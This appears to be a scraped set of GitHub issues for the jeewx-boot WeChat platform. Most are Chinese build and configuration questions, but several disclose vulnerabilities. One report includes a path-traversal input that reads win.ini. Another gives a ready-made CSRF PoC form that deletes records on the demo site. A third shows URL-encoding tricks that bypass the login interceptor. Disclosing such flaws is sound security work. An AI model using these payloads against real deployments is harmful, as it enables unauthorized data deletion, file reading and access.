所有项目编码集为utf-8,数据库字符集为utf-8,但是在页面修改数据，保存后，存到数据库中的数据是乱码

Information

Exploit Title:Jeewx-Boot-v1.3-Storage XSS
Exploit date:01.06.2021
Exploit Author:Al1ex@Heptagram
Vendor Homepage:https://github.com/zhangdaiscott/jeewx-boot
Affect Version:Jeewx-Boot-v1.3
Description:The background voting function module of jeewx-boot-v1.3 allows users to import data through templates, but does not filter the data strictly. An attacker can construct an excel with massive data and insert a malicious payload, and then cheat the administrator to import the Excel to trigger malicious XSS code.

How to Exploit

Step 1：download templates
Step 2：Insert malicious payload into template

Step 3：Then cheat the administrator to import the template application

The malicious payload was successfully executed

Suggestion

Encode the output content entity

问题描述：克隆项目后修改了只修改了数据相关配置，启动项目后给用户添加抽奖活动功能，然后点击抽奖活动，出现一直加载home页面

问题截图：

版本号：1.1.0

问题描述：请问该项目是采用什么生成entity、mapper等模块的

问题截图：

版本号：1.1.0

问题描述：演示地址有cms，拉下来的源码里没有

问题截图：

例：org.jeecgframework.p3.core.

Cannot resolve plugin org.springframework.boot:spring-boot-maven-plugin:<unknown>

https://github.com/zhangdaiscott/jeewx-boot/blob/fd4ee57e89f27b0b92f51f1862b94df8ca7b905b/jeewx-boot-base-system/pom.xml#L76

				<artifactId>spring-boot-maven-plugin</artifactId>
				<version>2.1.7.RELEASE</version>

你好，我简单看了下你的小程序，好像没找到可以发文章的入口，请问普通用户可以发表自己的东西吗

The problem exists in the "WeixinSystemProjectController.java",You can see that there is no filtering in the code:

The code use "${" to splice the parameters directly in the "WeixinSystemProject.xml".

And this leads to a SQL injection.

版本号：1.0.3

问题描述：jeewx-boot-start-core-1.0.5 无法下载

1.maven setting 已经设置
2.maven下载jar已经切换为jeewx 私服，私服似乎无法打开

问题截图：

#错误提示
Caused by: org.springframework.beans.factory.UnsatisfiedDependencyException: Error creating bean with name 'jwSystemAuthDao' defined

#问题描述
我发现DAO的实现类注解了
jeewx-boot/jeewx-boot-base-system/src/main/java/com/jeecg/p3/system/dao/impl/JwSystemAuthDaoImpl.java

版本号：

问题描述：

问题截图：

版本号：

2.4

问题描述：

IE浏览器下载文件时文件名出现乱码，chrome和edge浏览器功能正常
下载文件是用的jeecgListMixin.vue下面函数
downloadFile(text){
if(!text){
this.$message.warning("未知的文件")
return;
}
if(text.indexOf(",")>0){
text = text.substring(0,text.indexOf(","))
}
let url = getFileAccessHttpUrl(text)
window.open(url);
},

问题截图：

请问这是什么原因，谢谢帮忙

版本号：

问题描述：

看到 有引用核心包 jeewx-boot-start-core，这个也是有开源吗？还是需要闭源购买的呢？

问题截图：

不能群发消息?怎样添加群发消息？最后感谢分享

版本号：1.0.3

问题描述：jdk9 编译报错，替换了编译的class，启动报错

问题截图：

Caused by: java.lang.NoClassDefFoundError: sun/misc/BASE64Decoder
at org.apache.util.QEncodeUtil.base64Decode(QEncodeUtil.java:69)
at org.apache.util.QEncodeUtil.aesDecrypt(QEncodeUtil.java:161)
at org.jeecgframework.p3.core.aop.icorep3.check(icorep3.java:54)
at org.apache.commons.lang.StringUtil.lastIndexOf(StringUtil.java:1191)
at org.apache.commons.lang.StringUtil.(StringUtil.java:1383)
at org.apache.util.QEncodeUtil.aesDecrypt(QEncodeUtil.java:161)
at org.jeecgframework.p3.core.aop.icorep3.check(icorep3.java:54)
at org.apache.commons.lang.CommonRandomUtil.isNotEmpt(CommonRandomUtil.java:3952)
at org.apache.commons.lang.CommonRandomUtil.(CommonRandomUtil.java:119)
at com.jeecg.p3.config.mybatis.MybatisInterceptor.(MybatisInterceptor.java:37)
at java.base/jdk.internal.reflect.NativeConstructorAccessorImpl.newInstance0(Native Method)
at java.base/jdk.internal.reflect.NativeConstructorAccessorImpl.newInstance(NativeConstructorAccessorImpl.java:62)
at java.base/jdk.internal.reflect.DelegatingConstructorAccessorImpl.newInstance(DelegatingConstructorAccessorImpl.java:45)
at java.base/java.lang.reflect.Constructor.newInstance(Constructor.java:490)
at org.springframework.beans.BeanUtils.instantiateClass(BeanUtils.java:172)
at org.springframework.beans.factory.support.SimpleInstantiationStrategy.instantiate(SimpleInstantiationStrategy.java:87)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.instantiateBean(AbstractAutowireCapableBeanFactory.java:1279)
... 146 common frames omitted
jdk9以上不再有sun.misc.BASE64Decoder和sun.misc.BASE64Encoder

自定义菜单,选项中,还有其他功能,会出现中文乱码,如何解决?

文章插入视频是很多网站的基本需求，微信公众号的图文素材编辑就有视频编辑，本平台的文章插入视频试了腾讯和优酷的视频地址，都不能用

怎么和jeecgboot结合使用，能给个说明文档吗？

项目介绍里这句话：“最终打造像discuzz、微擎一样的插件生态圈。”其中的“discuzz”应该为“Discuz!”，如果你确实指的是 Discuz! 的话。

The problem exists in the "WxActGoldeneggsPrizesController.java",You can see that there is no filtering in the code:

The code use FileInputStream to load the file directly.

/../../../../../../../../../Windows/win.ini
Successfully read the file and return /Windows/win.ini

版本号：

问题描述：

问题截图：

版本号：

问题描述：

微信公众号文章图片上传出错
oss.imgDomain 怎么配置，配成公网也不行

问题截图：

版本号：

目前这个版本

问题描述：

1.我配置了jeewx.properties后，然后在公众号里面配置url token等信息，但是提交的时候一直失败，后台报错无权限
2.图片我用阿里的http不用定义域名行吗，然后我配置文件设置了阿里域名，最后回去到图片的路径还是以前的那个
3.关注后有个提示语，设置了文本消息，但是关注后没有任何反应

问题截图：

版本号：

问题描述：

问题截图：

版本号：

问题描述：

Failure to find org.jeewxframework.boot:jeewx-boot-start-core:pom:1.0.5 in http://maven.aliyun.com/nexus/content/groups/public was cached in the local repository, resolution will not be reattempted until the update interval of nexus-aliyun has elapsed or updates are forced

问题截图：

Information

Exploit Title:Jeewx-Boot-v1.3-Cross-site request forgery(CSRF)
Exploit date:01.06.2021
Exploit Author:Al1ex@Heptagram
Vendor Homepage:https://github.com/zhangdaiscott/jeewx-boot
Affect Version:Jeewx-Boot-v1.3
Description:There is CSRF vulnerability in jeewx-boot-v1.3. Attackers can construct a malicious page and cheat administrator users to access it, thus causing malicious payload to be triggered.

How to Exploit

Step 1：Add a record

Step 2：Then delete the record and use burpsuite to capture the package

Step 3：After that, use burpsuite to construct CSRF exp

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://demo.jeewx.com/businesshall/back/wxActBusinesshallRegistration/doDelete.do">
      <input type="hidden" name="id" value="ff80808179bd77900179c66b96e60266" />
      <input type="hidden" name="&#95;" value="1622531610993" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Step 4：Drop the burpsuite request packet and refresh the page to ensure that the record still exists

Step 5：After accessing the payload in the browser, you can see the successful execution


Step 6：After refreshing the page, it is found that the record has been successfully deleted

Suggestion

Using token to verify

版本号：

ALL

问题描述：

在类似/system/back/jwSystemUser/list.do页面可以通过将 back 编码或者访问 list.bbbb的方式绕过权限校验，造成未授权访问。

问题截图：

没有admin权限的时候，正常访问/system/back/jwSystemUser/list.do会返回401。
但是访问类似http://demo.jeewx.com/system/ba%63k/jwSystemUser/list.bbbb
由页面显示

同样访问 http://demo.jeewx.com/system/ba%63k/jwSystemUser/list.do

正常返回：

第一个主要问题在于
https://github.com/zhangdaiscott/jeewx-boot/blob/master/jeewx-boot-base-system/src/main/java/com/jeecg/p3/system/interceptors/LoginInterceptor.java#L113

list 为null的时候返回true。
第二个问题在于：
https://github.com/zhangdaiscott/jeewx-boot/blob/master/jeewx-boot-base-system/src/main/java/com/jeecg/p3/system/interceptors/LoginInterceptor.java#L51

url编码以后 requestPath.index("/back/")找不到，返回-1，函数返回true。

java -jar 运行时提示：没有主清单属性

版本号：1.3

问题描述：

1、AccseeToken获取问题：我是昨天和今天上午尝试修改菜单，但是一直提示未获取到AccseeToken，今天中午我没有关闭自己的服务器，下午再看就获取到了AccseeToken也能修改菜单，我也没有修改任何代码，是获取有延迟还是我设置的问题呢？
2、IP白名单问题：我自己创建了一个订阅号，我设置了自己电脑的IP为白名单但是在公众号授权中一直提示接口使用IP未在白名单中，想问一下IP必须是固定IP是吗，我自己的笔记本电脑IP是不可以的么，还有公众号测试号好像是不用设置IP白名单的是么。

如果您能解答我得疑惑会非常感谢！

问题截图：